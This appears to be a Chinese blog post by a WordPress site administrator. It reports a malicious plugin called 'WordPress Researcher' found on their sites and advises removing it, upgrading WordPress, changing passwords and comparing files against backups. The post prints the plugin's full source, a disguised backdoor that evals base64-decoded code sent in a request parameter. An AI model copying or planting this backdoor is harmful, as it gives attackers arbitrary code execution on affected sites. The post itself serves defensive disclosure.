WordPress是世界上最流行的CMS（这应该不会引起类似“PHP是最好的语言”的论战吧？），所以WordPress理所当然的会受到黑客的”特别对待“，最近在我管理的几个WordPress站点上莫名其妙的多了一个插件，插件名称为“WordPress Researcher”，乍一看名称，挺正常的一个插件，可仔细一看源码，是一个后门插件无疑，源码如下，非常简单，却给我们的WordPress注入了一个后门，果断删之！插件源码文件如下：请各位自行欣赏。

<?php
/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4
 
Copyright 2013 wordpressdotorg
 
 This program is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.
 
 This program is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 GNU General Public License for more details.
 
 You should have received a copy of the GNU General Public License
 along with this program; if not, write to the Free Software
 Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
*/
 
function research_plugin(){
  if (isset($_REQUEST['CSSl'])){
    eval(base64_decode($_REQUEST['CSSl']));
  } 
  return;
}
 
add_action('after_setup_theme', 'research_plugin');
?>

和WordPress Researcher插件一起安装的还有“Extend Calendar”这个插件，看代码也不是什么好货，一起删除了，然后修改升级到WordPress版本，修改后台的密码，如果不放心，看以把整个网站的代码下载下来，和之前的备份比对一下，看看还有没有其他文件被插件修改掉了。